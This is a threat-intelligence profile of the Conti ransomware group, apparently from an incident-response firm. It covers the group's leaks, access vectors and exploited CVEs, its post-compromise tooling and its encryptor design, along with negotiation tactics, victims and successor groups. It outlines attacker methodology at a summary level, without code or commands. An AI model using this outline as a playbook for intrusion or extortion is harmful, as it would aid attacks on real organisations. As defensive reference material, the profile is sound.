// Threat Intelligence Profile

Conti Ransomware

One of the most destructive ransomware operations in history, active 2020–2022. Dissolved after the Conti Leaks. Analysis based on 32 negotiation transcripts spanning the group's full operational period.

Operational Overview

Conti operated as one of the most prolific and technically capable ransomware groups from approximately mid-2020 until May 2022. The group was closely associated with the TrickBot/BazarLoader ecosystem and is widely assessed to be a successor operation to Ryuk ransomware, sharing significant personnel and tooling overlap. Unlike the fully decentralised RaaS model of groups like LockBit, Conti operated with a more structured, corporate-like hierarchy. Internal communications leaked in early 2022 revealed a professional criminal organisation with dedicated departments for development, negotiation, HR, and management — functioning much like a legitimate software company.

The Conti Leaks (February–March 2022) were triggered after Conti publicly sided with Russia following the invasion of Ukraine, provoking a Ukrainian security researcher to leak approximately 168,000 internal Jabber chat messages spanning from January 2021 to February 2022, along with source code, operational playbooks, and training materials. This leak provided an unprecedented window into ransomware group operations and directly led to Conti's dissolution. Key members were identified and the group formally disbanded in May 2022, with personnel dispersing to successor groups including BlackBasta, Royal, Quantum, and BlackByte.

Initial Access & Entry Vectors

Conti's primary initial access mechanism was TrickBot and BazarLoader malware, delivered through sophisticated phishing campaigns. The group had a symbiotic relationship with the TrickBot botnet operators, with compromised systems from TrickBot infections regularly handed off to Conti operators for ransomware deployment.

The leaked Conti playbooks detailed their post-compromise methodology with unusual specificity, including step-by-step instructions for:

  • Cobalt Strike deployment and configuration for command and control
  • Active Directory reconnaissance and domain takeover using Mimikatz and BloodHound
  • Lateral movement techniques using PsExec, WMI, and RDP
  • Defender and EDR evasion techniques
  • Data exfiltration procedures using Rclone
  • Encryption deployment via Group Policy to maximise simultaneous encryption across the environment

Conti also conducted opportunistic exploitation of known vulnerabilities in public-facing systems, including Fortinet FortiGate (CVE-2018-13379), Microsoft Exchange (ProxyShell), and VMware vCenter vulnerabilities.

Technical Characteristics

The Conti encryptor was written in C++ and was designed for speed and stealth. Key technical characteristics include:

  • Multi-threaded encryption: Conti used a highly parallelised encryption approach, using multiple CPU threads simultaneously to maximise encryption speed. This made Conti significantly faster than many contemporaneous ransomware variants.
  • Hybrid encryption: The encryptor used RSA-4096 to protect per-file AES-256 keys, with key material protected by an attacker-controlled RSA public key embedded in the binary.
  • Network share enumeration: Conti automatically enumerated and encrypted accessible network shares, spreading beyond the initially compromised system without requiring manual lateral movement for the encryption phase.
  • Shadow Copy deletion: Standard deletion of Volume Shadow Copies and backup catalogue entries using vssadmin and wbadmin.
  • ESXi targeting: A Linux variant was developed to target VMware ESXi servers, encrypting virtual machine disk files directly.

Negotiation Patterns & Demand Analysis

Conti operated a dedicated negotiation team, and the Conti Leaks revealed the internal communications of negotiators managing multiple active victims simultaneously. Our 32 transcripts, combined with the leaked internal data, provide an unusually comprehensive picture of Conti's negotiation approach.

Initial demands were calculated as a percentage of the victim's estimated annual revenue, typically targeting 1–3% for small organisations and up to 10% for larger enterprises. Demands routinely reached into the millions of dollars, with some large enterprise demands exceeding $25M. The leaked communications confirmed that negotiators operated under internal guidelines for minimum acceptable settlements and were required to obtain management approval before agreeing to reductions below certain thresholds.

Conti negotiators maintained a professional, transactional tone in communications with victims. The leaked internal chats, however, revealed a very different internal culture — negotiations were frequently mocked, and victims who showed distress were seen as weak positions to exploit. Negotiators were coached to maximise payment rather than settle early, with internal targets for deal closure.

The group operated a data leak site ("Conti News") where stolen victim data was published to increase pressure. In practice, our transcript data shows that Conti published data on organisations that refused to pay or whose negotiations broke down, but the threat of publication was also used as leverage throughout the negotiation process.

Notable Incidents

  • Health Service Executive (HSE) Ireland (May 2021): One of the most damaging healthcare cyber attacks in history. Ireland's national health service was crippled, with thousands of appointments cancelled and patient records inaccessible for weeks. Conti demanded $20M; Ireland refused to pay. Conti eventually provided a decryptor for free, but the recovery cost exceeded €600M.
  • Broward County Public Schools (March 2021): A $40M demand against one of the largest US school districts.
  • Costa Rica government (April 2022): A series of attacks on Costa Rican government ministries caused a national emergency declaration. This attack was likely conducted partly as a demonstration of capability following the Conti Leaks, to maintain credibility and affiliate confidence.

Legacy and Successor Groups

Conti's dissolution in May 2022 did not end the threat from its personnel or tooling. Key members and subgroups transitioned to or created the following successor operations:

  • Black Basta: Widely considered the primary successor, using Conti's tooling and personnel
  • Royal (now BlackSuit): Operated by former Conti members
  • BlackByte, Quantum, Karakurt: Other entities with documented Conti connections

The Conti encryptor source code, leaked in March 2022, has been repurposed by multiple subsequent threat actors, extending Conti's technical legacy well beyond the group's formal dissolution.

View Negotiation Transcripts

All 32 Conti ransomware negotiation transcripts are available in our public archive, documenting negotiations across the group's 2020–2022 operational period.

Quick Reference

StatusDEFUNCT
Active Period2020 – May 2022
Transcripts32
Demand Range$1M – $25M+
ModelCorporate RaaS / Double Extortion
Primary TargetsAll sectors, enterprise focus
Entry VectorsTrickBot, BazarLoader, phishing
DissolvedMay 2022 (post-Conti Leaks)

Key Negotiation Insights

ToneProfessional externally, aggressive internally
NegotiabilityModerate (internal approval required)
Timeline PressureHigh
Data Leak SiteConti News (now offline)
Min SettlementInternal thresholds documented in leaks

Related Resources

Dealing with a Conti Successor?

Black Basta and other Conti successors continue to operate. If you're facing an incident from a Conti-affiliated group, our team has direct experience with their tactics and negotiation patterns.

Get Emergency Help

Need Help Responding to a Conti-Affiliated Attack?

Conti's successor groups remain active. Our incident response team can help with containment, forensic investigation, negotiation, and recovery.

Contact Our Team
🚨 Active Incident? Contact Us Now